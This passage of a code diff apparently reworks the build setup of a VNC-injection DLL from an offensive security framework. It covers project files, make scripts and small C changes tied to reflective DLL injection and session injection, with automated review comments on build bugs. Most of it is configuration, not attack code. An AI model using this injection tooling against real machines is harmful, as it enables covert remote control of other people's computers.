DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,6 +0,0 @@
#ifdef _X64_
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
#endif


@ -1,437 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="loader"
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
RootNamespace="loader"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X86_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X64_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.x64.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.x64.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\context.c"
>
</File>
<File
RelativePath=".\loader.c"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.c"
>
</File>
<File
RelativePath=".\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.c"
>
</File>
<File
RelativePath=".\ps.c"
>
</File>
<File
RelativePath=".\session.c"
>
</File>
</Filter>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\context.h"
>
</File>
<File
RelativePath=".\loader.h"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.h"
>
</File>
<File
RelativePath=".\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\ReflectiveLoader.h"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.h"
>
</File>
<File
RelativePath=".\ps.h"
>
</File>
<File
RelativePath=".\session.h"
>
</File>
</Filter>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
<File
RelativePath=".\loader.rc"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

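--- a/external/source/vncdll/make.bat
+++ b/external/source/vncdll/make.bat
@@ -0,0 +1,32 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X64" GOTO BUILD_X64
+ECHO "Building VNCDLL x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+:BUILD_X86
+ECHO "Building VNCDLL x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+:BUILD_X64
+ECHO "Building VNCDLL x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+:RUN
+PUSHD workspace
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+GOTO :END
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+:END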
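Review bot: `IF "%1"=="X64" GOTO BUILD_X64` is a case-sensitive string compare, so `make.bat x64` (lower-case, the spelling the `x86` branch uses) falls through to the "all" build instead of the x64 one; `IF /I "%1"=="x64" GOTO BUILD_X64` (and `/I` on the x86 test for symmetry) fixes that. The `:RUN` block also runs `PUSHD workspace` before invoking `make.msbuild`, yet this commit adds make.msbuild next to make.bat at `external/source/vncdll/`, not under a `workspace` directory, so unless a copy exists there that this page does not show, msbuild will not find the project file. Finally, msbuild's exit status is discarded: `GOTO :END` after `POPD` exits with success even when the build failed, so `SET RC=%ERRORLEVEL%` after the msbuild line and `EXIT /B %RC%` at `:END` would let callers see failures. A one-line header comment listing the accepted arguments (`x86`, `x64`, or none for both) would help too.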

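--- a/external/source/vncdll/make.msbuild
+++ b/external/source/vncdll/make.msbuild
@@ -0,0 +1,19 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<PropertyGroup>
+<SolutionPath>.\vncdll.sln</SolutionPath>
+</PropertyGroup>
+<Target Name="all" DependsOnTargets="x86;x64" />
+<Target Name="x86">
+<Message Text="Building VNCDLL x86 Release version" />
+<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+</Target>
+<Target Name="x64">
+<Message Text="Building VNCDLL x64 Release version" />
+<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+</Target>
+</Project>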
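Review bot: `Targets="Clean;Rebuild"` on both `<MSBuild>` tasks is redundant, since the Rebuild target already performs Clean followed by Build, so each platform is cleaned twice; `Targets="Rebuild"` expresses the same intent. A short `<!-- Driven by make.bat; Release configuration only, x86 and x64 -->` comment at the top would tell the next reader why only Release is covered here.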

Binary file not shown.

Binary file not shown.


@ -1,11 +1,10 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
ProjectSection(ProjectDependencies) = postProject
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
EndProjectSection
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
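Review bot: The new project-configuration lines for the vncdll project (`{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}`, which I read as the added side of the second hunk since the rendered view lost the +/- markers) carry only `ActiveCfg` entries for the x64 configurations, no `Build.0`, and `Debug|x64.ActiveCfg` maps to `Debug|Win32`. The consequence is that a solution build with Platform=x64, which is exactly what make.msbuild's `x64` target requests, builds winvnc for x64 but skips vncdll, so no x64 vncdll comes out of that path. The removed lines had the full set; what is missing on the new side is `{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64`, `{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64` and `{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64`.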


@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{
do
{
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
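Review bot: `_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, ... )` passes an explicit count rather than `_TRUNCATE`; if I recall the secure-CRT contract correctly, output longer than an explicit count is not truncated but empties the buffer and invokes the invalid-parameter handler, which terminates the process by default. With the fixed `\\\\.\\pipe\\%08X` format the result is far shorter than MAX_PATH, so it cannot fire here, but the same call shape in loader.c (`/v /c:0x%08p` into COMMANDLINE_LENGTH, where `%p` expands to 16 hex digits on x64) has the same property, and `_TRUNCATE` as the count states the intent of the `- 1` without that failure mode. The return value is also unchecked at both sites. The enclosing `context_message_thread` starts and ends outside the hunk.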


@ -1,7 +1,7 @@
#include "loader.h"
#include "ps.h"
#include "inject.h"
#include "LoadLibraryR.h"
#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch


@ -5,11 +5,12 @@
#include "ps.h"
#include "session.h"
#include "inject.h"
#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* The HINSTANCE of this injected dll.
*/
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess;
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 );
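Review bot: `#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"` compiles the whole reflective loader into loader.c's translation unit, and nothing on the page says why a .c rather than the header is pulled in. If the upstream file carries the same `#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN` `DllMain` block that the removed copy in this commit had, that `DllMain` now lives in this file too, so anyone adding one here must define that macro first or get a duplicate-definition error. A comment above the include such as `// the reflective loader is compiled into this translation unit so it is built with this project's settings; it also supplies DllMain unless REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN is defined` would keep the next reader from "fixing" it back to `ReflectiveLoader.h`. The enclosing file-scope region continues outside the hunk.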

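--- a/external/source/vncdll/vncdll/loader.rc
+++ b/external/source/vncdll/vncdll/loader.rc
@@ -0,0 +1,18 @@
+#ifdef _X64_
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
+#endif
+#else
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
+#endif
+#endif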
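Review bot: The `#ifdef _X64_` selection only works if the resource compiler is handed that symbol; the deleted loader.vcproj set `_X64_` in `VCResourceCompilerTool` for its x64 configurations, but the new vncdll.vcxproj section is cut off in this view, so I could not confirm the new project does the same. If rc.exe does not receive `_X64_` for x64 builds, the x64 vncdll silently embeds `winvnc.x86.dll` and the mismatch only surfaces at run time. A comment above the first `#ifdef`, e.g. `// _X64_ must be defined for the resource compiler in the x64 configurations (see vncdll.vcxproj); otherwise the x86 winvnc DLL is embedded`, would document the coupling.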


@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{
if( !pProcessIdToSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
}
@ -53,7 +53,7 @@ DWORD session_activeid()
{
if( !pWTSGetActiveConsoleSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
}
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken );
}
hKernel = LoadLibrary( "kernel32" );
hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;
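Review bot: The third call site, `hKernel = LoadLibraryA( "kernel32" )` in `session_inject`, drops the `.dll` suffix that the two sites above use; the loader appends it, so it works, but making the three strings identical (`"kernel32.dll"`) spares a reader from wondering whether a different module is meant. Since kernel32 is already mapped in every process, `GetModuleHandleA( "kernel32.dll" )` would serve all three sites and does not increment the module reference count, which matters if no `FreeLibrary` pairs with these calls; I cannot see one in the hunks. The enclosing functions start and end outside the hunks.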

external/source/vncdll/vncdll/vncdll.vcxproj vendored Executable file

@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
<RootNamespace>vncdll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
